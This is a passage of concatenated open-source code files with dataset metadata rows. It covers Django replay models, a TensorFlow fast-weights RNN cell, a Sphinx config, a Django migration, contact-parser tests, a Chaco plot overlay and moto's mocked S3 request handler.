except Exception:
return '#2'
def __str__(self):
return '{} on Team {}'.format(
self.player_name,
self.team,
)
class Meta:
ordering = ('team', '-score', 'player_name')
class Goal(models.Model):
replay = models.ForeignKey(
Replay,
db_index=True,
)
# Goal 1, 2, 3 etc..
number = models.PositiveIntegerField()
player = models.ForeignKey(
Player,
db_index=True,
)
frame = models.IntegerField(
blank=True,
null=True,
)
@cached_property
def goal_time(self):
if not self.frame or not self.replay.record_fps:
return 'N/A'
calculation = self.frame / self.replay.record_fps
minutes, seconds = divmod(calculation, 60)
return '%d:%02d' % (
int(minutes),
int(seconds),
)
def __str__(self):
try:
return 'Goal {} by {}'.format(
self.number,
self.player,
)
except Player.DoesNotExist:
return 'Goal {}'.format(
self.number,
)
class Meta:
ordering = ['frame']
class ReplayPack(models.Model):
title = models.CharField(
max_length=50,
)
user = models.ForeignKey(
settings.AUTH_USER_MODEL,
db_index=True,
)
replays = models.ManyToManyField(
Replay,
blank=True,
)
file = models.FileField(
upload_to='uploads/replaypack_files',
blank=True,
null=True,
)
date_created = models.DateTimeField(
auto_now_add=True,
)
last_updated = models.DateTimeField(
auto_now=True,
)
@cached_property
def maps(self):
maps = Map.objects.filter(
id__in=set(self.replays.values_list('map_id', flat=True))
).values_list('title', flat=True)
return ', '.join(maps)
@cached_property
def goals(self):
if not self.replays.count():
return 0
return self.replays.aggregate(
num_goals=models.Sum(models.F('team_0_score') + models.F('team_1_score'))
)['num_goals']
@cached_property
def players(self):
return set(Player.objects.filter(
replay_id__in=self.replays.values_list('id', flat=True),
).values_list('player_name', flat=True))
@cached_property
def total_duration(self):
calculation = 0
if self.replays.count():
calculation = self.replays.aggregate(models.Sum('num_frames'))['num_frames__sum'] / 30
minutes, seconds = divmod(calculation, 60)
hours, minutes = divmod(minutes, 60)
return '{} {}m {}s'.format(
'{}h'.format(int(hours)) if hours > 0 else '',
int(minutes),
int(seconds),
)
def __str__(self):
return self.title
def get_absolute_url(self):
return reverse('replaypack:detail', kwargs={
'pk': self.pk,
})
class Meta:
ordering = ['-last_updated', '-date_created']
class BoostData(models.Model):
replay = models.ForeignKey(
Replay,
db_index=True,
)
player = models.ForeignKey(
Player,
)
frame = models.PositiveIntegerField()
value = models.PositiveIntegerField(
validators=[MinValueValidator(0), MaxValueValidator(255)]
)
class Meta:
ordering = ['player', 'frame']
# unique_together = [('player', 'frame', 'value')]
class Component(models.Model):
type = models.CharField(
max_length=8,
choices=[
('trail', 'Trail'),
('antenna', 'Antenna'),
('wheels', 'Wheels'),
('decal', 'Decal'),
('body', 'Body'),
('topper', 'Topper')
],
default='body',
)
internal_id = models.PositiveIntegerField()
name = models.CharField(
max_length=100,
default='Unknown',
)
| gpl-3.0 | 6,570,715,833,901,000,000 | 24.839542 | 159 | 0.536741 | false |
jxwufan/AssociativeRetrieval | FastWeightsRNN.py | 1 | 4632 | """
Fast Weights Cell.
Ba et al. Using Fast Weights to Attend to the Recent Past
https://arxiv.org/abs/1610.06258
"""
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import rnn_cell
from tensorflow.python.ops import variable_scope as vs
from tensorflow.python.platform import tf_logging as logging
from tensorflow.contrib.layers.python.layers import layer_norm
from tensorflow.python.util import nest
import tensorflow as tf
import numpy as np
class LayerNormFastWeightsBasicRNNCell(rnn_cell.RNNCell):
def __init__(self, num_units, forget_bias=1.0, reuse_norm=False,
input_size=None, activation=nn_ops.relu,
layer_norm=True, norm_gain=1.0, norm_shift=0.0,
loop_steps=1, decay_rate=0.9, learning_rate=0.5,
dropout_keep_prob=1.0, dropout_prob_seed=None):
if input_size is not None:
logging.warn("%s: The input_size parameter is deprecated.", self)
self._num_units = num_units
self._activation = activation
self._forget_bias = forget_bias
self._reuse_norm = reuse_norm
self._keep_prob = dropout_keep_prob
self._seed = dropout_prob_seed
self._layer_norm = layer_norm
self._S = loop_steps
self._eta = learning_rate
self._lambda = decay_rate
self._g = norm_gain
self._b = norm_shift
@property
def state_size(self):
return self._num_units
@property
def output_size(self):
return self._num_units
def _norm(self, inp, scope=None):
reuse = tf.get_variable_scope().reuse
with vs.variable_scope(scope or "Norm") as scope:
normalized = layer_norm(inp, reuse=reuse, scope=scope)
return normalized
def _fwlinear(self, args, output_size, scope=None):
if args is None or (nest.is_sequence(args) and not args):
raise ValueError("`args` must be specified")
if not nest.is_sequence(args):
args = [args]
assert len(args) == 2
assert args[0].get_shape().as_list()[1] == output_size
dtype = [a.dtype for a in args][0]
with vs.variable_scope(scope or "Linear"):
matrixW = vs.get_variable(
"MatrixW", dtype=dtype, initializer=tf.convert_to_tensor(np.eye(output_size, dtype=np.float32) * .05))
matrixC = vs.get_variable(
"MatrixC", [args[1].get_shape().as_list()[1], output_size], dtype=dtype)
res = tf.matmul(args[0], matrixW) + tf.matmul(args[1], matrixC)
return res
def zero_fast_weights(self, batch_size, dtype):
"""Return zero-filled fast_weights tensor(s).
Args:
batch_size: int, float, or unit Tensor representing the batch size.
dtype: the data type to use for the state.
Returns:
A zero filled fast_weights of shape [batch_size, state_size, state_size]
"""
state_size = self.state_size
zeros = array_ops.zeros(
array_ops.pack([batch_size, state_size, state_size]), dtype=dtype)
zeros.set_shape([None, state_size, state_size])
return zeros
def _vector2matrix(self, vector):
memory_size = vector.get_shape().as_list()[1]
return tf.reshape(vector, [-1, memory_size, 1])
def _matrix2vector(self, matrix):
return tf.squeeze(matrix, [2])
def __call__(self, inputs, state, scope=None):
state, fast_weights = state
with vs.variable_scope(scope or type(self).__name__) as scope:
"""Compute Wh(t) + Cx(t)"""
linear = self._fwlinear([state, inputs], self._num_units, False)
"""Compute h_0(t+1) = f(Wh(t) + Cx(t))"""
if not self._reuse_norm:
h = self._activation(self._norm(linear, scope="Norm0"))
else:
h = self._activation(self._norm(linear))
h = self._vector2matrix(h)
linear = self._vector2matrix(linear)
for i in range(self._S):
"""
Compute h_{s+1}(t+1) = f([Wh(t) + Cx(t)] + A(t) h_s(t+1)), S times.
See Eqn (2) in the paper.
"""
if not self._reuse_norm:
h = self._activation(self._norm(linear +
math_ops.batch_matmul(fast_weights, h), scope="Norm%d" % (i + 1)))
else:
h = self._activation(self._norm(linear +
math_ops.batch_matmul(fast_weights, h)))
"""
Compute A(t+1) according to Eqn (4)
"""
state = self._vector2matrix(state)
new_fast_weights = self._lambda * fast_weights + self._eta * math_ops.batch_matmul(state, state, adj_y=True)
h = self._matrix2vector(h)
return h, (h, new_fast_weights)
| apache-2.0 | -2,072,723,172,511,365,600 | 33.311111 | 114 | 0.62975 | false |
murphycj/AGFusion | doc/conf.py | 1 | 9896 | # -*- coding: utf-8 -*-
#
# AGFusion documentation build configuration file, created by
# sphinx-quickstart on Mon Oct 10 11:07:09 2016.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
import sphinx_rtd_theme
html_theme = "sphinx_rtd_theme"
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
extensions = [
'sphinx.ext.autodoc',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'AGFusion'
copyright = '2016, Charlie Murphy'
author = 'Charlie Murphy'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#
# today = ''
#
# Else, today_fmt is used as the format for a strftime call.
#
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents.
# "<project> v<release> documentation" by default.
#
# html_title = u'AGFusion v0.1'
# A shorter title for the navigation bar. Default is the same as html_title.
#
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#
# html_logo = None
# The name of an image file (relative to this directory) to use as a favicon of
# the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#
# html_extra_path = []
# If not None, a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
# The empty string is equivalent to '%b %d, %Y'.
#
# html_last_updated_fmt = None
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#
# html_additional_pages = {}
# If false, no module index is generated.
#
# html_domain_indices = True
# If false, no index is generated.
#
# html_use_index = True
# If true, the index is split into individual pages for each letter.
#
# html_split_index = False
# If true, links to the reST sources are added to the pages.
#
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr', 'zh'
#
# html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# 'ja' uses this config value.
# 'zh' user can custom change `jieba` dictionary path.
#
# html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#
# html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'AGFusiondoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'AGFusion.tex', 'AGFusion Documentation',
'Charlie Murphy', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#
# latex_use_parts = False
# If true, show page references after internal links.
#
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
#
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
#
# latex_appendices = []
# It false, will not define \strong, \code, itleref, \crossref ... but only
# \sphinxstrong, ..., \sphinxtitleref, ... To help avoid clash with user added
# packages.
#
# latex_keep_old_macro_names = True
# If false, no module index is generated.
#
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'agfusion', 'AGFusion Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'AGFusion', 'AGFusion Documentation',
author, 'AGFusion', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#
# texinfo_appendices = []
# If false, no module index is generated.
#
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#
# texinfo_no_detailmenu = False
| mit | 5,436,764,078,029,414,000 | 27.518732 | 80 | 0.691795 | false |
xkmato/casepro | casepro/msgs/migrations/0053_faq.py | 1 | 1113 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('orgs', '0016_taskstate_is_disabled'),
('msgs', '0052_triggers'),
]
operations = [
migrations.CreateModel(
name='FAQ',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('question', models.CharField(max_length=255)),
('answer', models.TextField()),
('language', models.CharField(help_text='Language for this FAQ', max_length=3, null=True, verbose_name='Language', blank=True)),
('labels', models.ManyToManyField(help_text='Labels assigned to this FAQ', related_name='faqs', to='msgs.Label')),
('org', models.ForeignKey(related_name='faqs', verbose_name='Organization', to='orgs.Org')),
('parent', models.ForeignKey(related_name='translations', blank=True, to='msgs.FAQ', null=True)),
],
),
]
| bsd-3-clause | 3,345,618,433,227,566,000 | 40.222222 | 144 | 0.585804 | false |
praekelt/vumi-go | go/contacts/parsers/test_parsers.py | 1 | 7412 | from os import path
from go.vumitools.tests.helpers import djangotest_imports
parser_classes = ['CSVFileParser', 'XLSFileParser']
with djangotest_imports(globals(), dummy_classes=parser_classes):
from django.conf import settings
from django.core.files.storage import default_storage
from django.core.files.base import ContentFile
from go.base.tests.helpers import GoDjangoTestCase
from go.contacts.parsers import ContactParserException
from go.contacts.parsers.csv_parser import CSVFileParser
from go.contacts.parsers.xls_parser import XLSFileParser
class ParserTestCase(GoDjangoTestCase):
def setUp(self):
self.parser = self.PARSER_CLASS()
def fixture(self, fixture_name):
fixture_path = path.join(settings.PROJECT_ROOT, 'base', 'fixtures',
fixture_name)
content_file = ContentFile(open(fixture_path, 'r').read())
fpath = default_storage.save('tmp/%s' % (fixture_name,), content_file)
self.add_cleanup(default_storage.delete, fpath)
return fpath
class TestCSVParser(ParserTestCase):
PARSER_CLASS = CSVFileParser
def test_guess_headers_and_row_without_headers(self):
csv_file = self.fixture('sample-contacts.csv')
data = self.parser.guess_headers_and_row(csv_file)
has_headers, known_headers, sample_row = data
self.assertFalse(has_headers)
self.assertEqual(known_headers, self.parser.DEFAULT_HEADERS)
def test_guess_headers_and_row_with_headers(self):
csv_file = self.fixture('sample-contacts-with-headers.csv')
data = self.parser.guess_headers_and_row(csv_file)
has_headers, known_headers, sample_row = data
self.assertTrue(has_headers)
self.assertEqual(known_headers, self.parser.DEFAULT_HEADERS)
self.assertEqual(sample_row, {
'name': 'Name 1',
'surname': 'Surname 1',
'msisdn': '+27761234561',
})
def test_guess_headers_and_row_with_key_header(self):
csv_file = self.fixture('sample-contacts-with-key-header.csv')
data = self.parser.guess_headers_and_row(csv_file)
has_headers, known_headers, sample_row = data
self.assertTrue(has_headers)
self.assertEqual(known_headers, self.parser.DEFAULT_HEADERS)
self.assertEqual(sample_row, {
'key': 'foo',
'surname': 'Surname 1',
})
def test_guess_headers_and_row_one_column_with_plus(self):
csv_file = self.fixture('sample-contacts-one-column-with-plus.csv')
data = self.parser.guess_headers_and_row(csv_file)
has_headers, known_headers, sample_row = data
self.assertTrue(has_headers)
self.assertEqual(known_headers, self.parser.DEFAULT_HEADERS)
self.assertEqual(sample_row, {'msisdn': '+27761234561'})
def test_contacts_parsing(self):
csv_file = self.fixture('sample-contacts-with-headers.csv')
fp = default_storage.open(csv_file, 'rU')
contacts = list(self.parser.parse_file(fp, zip(
['name', 'surname', 'msisdn'],
['string', 'string', 'msisdn_za']), has_header=True))
self.assertEqual(contacts, [
{
'msisdn': '+27761234561',
'surname': 'Surname 1',
'name': 'Name 1'},
{
'msisdn': '+27761234562',
'surname': 'Surname 2',
'name': 'Name 2'},
{
'msisdn': '+27761234563',
'surname': 'Surname 3',
'name': 'Name 3'},
])
def test_contacts_with_none_entries(self):
csv_file = self.fixture('sample-contacts-with-headers-and-none.csv')
fp = default_storage.open(csv_file, 'rU')
contacts = list(self.parser.parse_file(fp, zip(
['name', 'surname', 'msisdn'],
['string', 'string', 'msisdn_za']), has_header=True))
self.assertEqual(contacts, [
{
'msisdn': '+27761234561',
'name': 'Name 1'},
{
'msisdn': '+27761234562',
'name': 'Name 2'},
{
'msisdn': '+27761234563',
'surname': 'Surname 3',
'name': 'Name 3'},
])
def test_contacts_with_missing_fields(self):
csv_file = self.fixture(
'sample-contacts-with-headers-and-missing-fields.csv')
fp = default_storage.open(csv_file, 'rU')
contacts_iter = self.parser.parse_file(fp, zip(
['name', 'surname', 'msisdn'],
['string', 'string', 'msisdn_za']), has_header=True)
contacts = []
try:
for contact in contacts_iter:
if contact['name'] == 'Extra rows':
# We don't care about these rows.
continue
contacts.append(contact)
except ContactParserException as err:
self.assertEqual(err.args[0], 'Invalid row: not enough fields.')
self.assertEqual(contacts, [{
'msisdn': '+27761234561',
'surname': 'Surname 1',
'name': 'Name 1',
}])
def test_contacts_with_extra_fields(self):
csv_file = self.fixture(
'sample-contacts-with-headers-and-extra-fields.csv')
fp = default_storage.open(csv_file, 'rU')
contacts_iter = self.parser.parse_file(fp, zip(
['name', 'surname', 'msisdn'],
['string', 'string', 'msisdn_za']), has_header=True)
contacts = []
try:
for contact in contacts_iter:
if contact['name'] == 'Extra rows':
# We don't care about these rows.
continue
contacts.append(contact)
except ContactParserException as err:
self.assertEqual(err.args[0], 'Invalid row: too many fields.')
self.assertEqual(contacts, [{
'msisdn': '+27761234561',
'surname': 'Surname 1',
'name': 'Name 1',
}])
class TestXLSParser(ParserTestCase):
PARSER_CLASS = XLSFileParser
def test_guess_headers_and_row_without_headers(self):
xls_file = self.fixture('sample-contacts.xls')
data = self.parser.guess_headers_and_row(xls_file)
has_headers, known_headers, sample_row = data
self.assertFalse(has_headers)
self.assertEqual(known_headers, self.parser.DEFAULT_HEADERS)
def test_guess_headers_and_row_with_headers(self):
xls_file = self.fixture('sample-contacts-with-headers.xlsx')
data = self.parser.guess_headers_and_row(xls_file)
has_headers, known_headers, sample_row = data
self.assertTrue(has_headers)
self.assertTrue('mathare-kiamaiko' in known_headers)
self.assertTrue('baba dogo' in known_headers)
self.assertTrue('mathare-kiamaiko' in sample_row)
self.assertTrue('baba dogo' in sample_row)
def test_contacts_parsing(self):
xls_file = self.fixture('sample-contacts-with-headers.xlsx')
contacts = list(self.parser.parse_file(xls_file, zip(
['name', 'surname', 'msisdn'],
['string', 'integer', 'number']), has_header=True))
self.assertEqual(contacts[0], {
'msisdn': '1.0',
'surname': '2',
'name': 'xxx'})
| bsd-3-clause | 2,594,425,094,356,202,500 | 39.282609 | 78 | 0.584188 | false |
USGSDenverPychron/pychron | pychron/graph/guide_overlay.py | 1 | 3622 | # ===============================================================================
# Copyright 2011 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# =============enthought library imports=======================
from chaco.api import AbstractOverlay
from enable.colors import ColorTrait
from enable.enable_traits import LineStyle
from enable.label import Label
from enable.tools.drag_tool import DragTool
from traits.api import Enum, Float, Instance
# =============standard library imports ========================
# =============local library imports ==========================
class GuideOverlayMoveTool(DragTool):
hit_length = 5
def is_draggable(self, x, y):
ov = self.overlay
if ov.orientation == 'v':
mapper = ov.component.index_mapper
cv = x
else:
mapper = ov.component.value_mapper
cv = y
v = mapper.map_screen(ov.value)
return abs(cv - v) < self.hit_length
def dragging(self, event):
ov = self.overlay
if ov.orientation == 'v':
v = event.x
mapper = ov.component.index_mapper
else:
v = event.y
mapper = ov.component.value_mapper
ov.value = mapper.map_data(v)
ov.display_value = True
ov.label_position = (event.x + 5, event.y + 5)
ov.invalidate_and_redraw()
def drag_end(self, event):
self.overlay.display_value = False
self.overlay.invalidate_and_redraw()
def drag_cancel(self, event):
self.drag_end(event)
class GuideOverlay(AbstractOverlay):
"""
draws a horizontal or vertical line at the specified value
"""
orientation = Enum('h', 'v')
value = Float
color = ColorTrait("red")
line_style = LineStyle('dash')
line_width = Float(1)
display_value = False
label = Instance(Label, ())
def overlay(self, component, gc, view_bounds=None, mode='normal'):
with gc:
gc.clip_to_rect(component.x, component.y, component.width, component.height)
with gc:
gc.set_line_dash(self.line_style_)
gc.set_line_width(self.line_width)
gc.set_stroke_color(self.color_)
gc.begin_path()
if self.orientation == 'h':
x1 = component.x
x2 = component.x2
y1 = y2 = component.value_mapper.map_screen(self.value)
else:
y1 = component.y
y2 = component.y2
x1 = x2 = component.index_mapper.map_screen(self.value)
gc.move_to(x1, y1)
gc.line_to(x2, y2)
gc.stroke_path()
if self.display_value:
with gc:
l = self.label
l.text = '{:0.5f}'.format(self.value)
l.position = self.label_position
l.draw(gc)
# ============= EOF =====================================
| apache-2.0 | -3,389,673,578,266,769,000 | 31.630631 | 88 | 0.532579 | false |
kefo/moto | moto/s3/responses.py | 1 | 49976 | from __future__ import unicode_literals
import re
import six
from moto.core.utils import str_to_rfc_1123_datetime
from six.moves.urllib.parse import parse_qs, urlparse
import xmltodict
from moto.core.responses import _TemplateEnvironmentMixin
from moto.s3bucket_path.utils import bucket_name_from_url as bucketpath_bucket_name_from_url, parse_key_name as bucketpath_parse_key_name, is_delete_keys as bucketpath_is_delete_keys
from .exceptions import BucketAlreadyExists, S3ClientError, MissingBucket, MissingKey, InvalidPartOrder
from .models import s3_backend, get_canned_acl, FakeGrantee, FakeGrant, FakeAcl, FakeKey, FakeTagging, FakeTagSet, FakeTag
from .utils import bucket_name_from_url, metadata_from_headers
from xml.dom import minidom
REGION_URL_REGEX = r'\.s3-(.+?)\.amazonaws\.com'
DEFAULT_REGION_NAME = 'us-east-1'
def parse_key_name(pth):
return pth.lstrip("/")
def is_delete_keys(request, path, bucket_name):
return path == u'/?delete' or (
path == u'/' and
getattr(request, "query_string", "") == "delete"
)
class ResponseObject(_TemplateEnvironmentMixin):
def __init__(self, backend):
super(ResponseObject, self).__init__()
self.backend = backend
@property
def should_autoescape(self):
return True
def all_buckets(self):
# No bucket specified. Listing all buckets
all_buckets = self.backend.get_all_buckets()
template = self.response_template(S3_ALL_BUCKETS)
return template.render(buckets=all_buckets)
def subdomain_based_buckets(self, request):
host = request.headers.get('host', request.headers.get('Host'))
if not host:
host = urlparse(request.url).netloc
if not host or host.startswith("localhost") or re.match(r"^[^.]+$", host):
# For localhost or local domain names, default to path-based buckets
return False
match = re.match(r'^([^\[\]:]+)(:\d+)?$', host)
if match:
match = re.match(r'((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)(\.|$)){4}',
match.groups()[0])
if match:
return False
match = re.match(r'^\[(.+)\](:\d+)?$', host)
if match:
match = re.match(r'^(((?=.*(::))(?!.*\3.+\3))\3?|[\dA-F]{1,4}:)([\dA-F]{1,4}(\3|:\b)|\2){5}(([\dA-F]{1,4}(\3|:\b|$)|\2){2}|(((2[0-4]|1\d|[1-9])?\d|25[0-5])\.?\b){4})\Z',
match.groups()[0], re.IGNORECASE)
if match:
return False
path_based = (host == 's3.amazonaws.com' or re.match(
r"s3[\.\-]([^.]*)\.amazonaws\.com", host))
return not path_based
def is_delete_keys(self, request, path, bucket_name):
if self.subdomain_based_buckets(request):
return is_delete_keys(request, path, bucket_name)
else:
return bucketpath_is_delete_keys(request, path, bucket_name)
def parse_bucket_name_from_url(self, request, url):
if self.subdomain_based_buckets(request):
return bucket_name_from_url(url)
else:
return bucketpath_bucket_name_from_url(url)
def parse_key_name(self, request, url):
if self.subdomain_based_buckets(request):
return parse_key_name(url)
else:
return bucketpath_parse_key_name(url)
def ambiguous_response(self, request, full_url, headers):
# Depending on which calling format the client is using, we don't know
# if this is a bucket or key request so we have to check
if self.subdomain_based_buckets(request):
return self.key_response(request, full_url, headers)
else:
# Using path-based buckets
return self.bucket_response(request, full_url, headers)
def bucket_response(self, request, full_url, headers):
try:
response = self._bucket_response(request, full_url, headers)
except S3ClientError as s3error:
response = s3error.code, {}, s3error.description
if isinstance(response, six.string_types):
return 200, {}, response.encode("utf-8")
else:
status_code, headers, response_content = response
return status_code, headers, response_content.encode("utf-8")
def _bucket_response(self, request, full_url, headers):
parsed_url = urlparse(full_url)
querystring = parse_qs(parsed_url.query, keep_blank_values=True)
method = request.method
region_name = DEFAULT_REGION_NAME
region_match = re.search(REGION_URL_REGEX, full_url)
if region_match:
region_name = region_match.groups()[0]
bucket_name = self.parse_bucket_name_from_url(request, full_url)
if not bucket_name:
# If no bucket specified, list all buckets
return self.all_buckets()
if hasattr(request, 'body'):
# Boto
body = request.body
else:
# Flask server
body = request.data
if body is None:
body = b''
if isinstance(body, six.binary_type):
body = body.decode('utf-8')
if method == 'HEAD':
return self._bucket_response_head(bucket_name, headers)
elif method == 'GET':
return self._bucket_response_get(bucket_name, querystring, headers)
elif method == 'PUT':
return self._bucket_response_put(request, body, region_name, bucket_name, querystring, headers)
elif method == 'DELETE':
return self._bucket_response_delete(body, bucket_name, querystring, headers)
elif method == 'POST':
return self._bucket_response_post(request, body, bucket_name, headers)
else:
raise NotImplementedError(
"Method {0} has not been impelemented in the S3 backend yet".format(method))
def _bucket_response_head(self, bucket_name, headers):
try:
self.backend.get_bucket(bucket_name)
except MissingBucket:
# Unless we do this, boto3 does not raise ClientError on
# HEAD (which the real API responds with), and instead
# raises NoSuchBucket, leading to inconsistency in
# error response between real and mocked responses.
return 404, {}, "Not Found"
return 200, {}, ""
def _bucket_response_get(self, bucket_name, querystring, headers):
if 'uploads' in querystring:
for unsup in ('delimiter', 'max-uploads'):
if unsup in querystring:
raise NotImplementedError(
"Listing multipart uploads with {} has not been implemented yet.".format(unsup))
multiparts = list(
self.backend.get_all_multiparts(bucket_name).values())
if 'prefix' in querystring:
prefix = querystring.get('prefix', [None])[0]
multiparts = [
upload for upload in multiparts if upload.key_name.startswith(prefix)]
template = self.response_template(S3_ALL_MULTIPARTS)
return template.render(
bucket_name=bucket_name,
uploads=multiparts)
elif 'location' in querystring:
bucket = self.backend.get_bucket(bucket_name)
template = self.response_template(S3_BUCKET_LOCATION)
return template.render(location=bucket.location)
elif 'lifecycle' in querystring:
bucket = self.backend.get_bucket(bucket_name)
if not bucket.rules:
template = self.response_template(S3_NO_LIFECYCLE)
return 404, {}, template.render(bucket_name=bucket_name)
template = self.response_template(
S3_BUCKET_LIFECYCLE_CONFIGURATION)
return template.render(rules=bucket.rules)
elif 'versioning' in querystring:
versioning = self.backend.get_bucket_versioning(bucket_name)
template = self.response_template(S3_BUCKET_GET_VERSIONING)
return template.render(status=versioning)
elif 'policy' in querystring:
policy = self.backend.get_bucket_policy(bucket_name)
if not policy:
template = self.response_template(S3_NO_POLICY)
return 404, {}, template.render(bucket_name=bucket_name)
return 200, {}, policy
elif 'website' in querystring:
website_configuration = self.backend.get_bucket_website_configuration(
bucket_name)
if not website_configuration:
template = self.response_template(S3_NO_BUCKET_WEBSITE_CONFIG)
return 404, {}, template.render(bucket_name=bucket_name)
return website_configuration
elif 'acl' in querystring:
bucket = self.backend.get_bucket(bucket_name)
template = self.response_template(S3_OBJECT_ACL_RESPONSE)
return template.render(obj=bucket)
elif 'tagging' in querystring:
bucket = self.backend.get_bucket(bucket_name)
# "Special Error" if no tags:
if len(bucket.tagging.tag_set.tags) == 0:
template = self.response_template(S3_NO_BUCKET_TAGGING)
return 404, {}, template.render(bucket_name=bucket_name)
template = self.response_template(S3_BUCKET_TAGGING_RESPONSE)
return template.render(bucket=bucket)
elif "cors" in querystring:
bucket = self.backend.get_bucket(bucket_name)
if len(bucket.cors) == 0:
template = self.response_template(S3_NO_CORS_CONFIG)
return 404, {}, template.render(bucket_name=bucket_name)
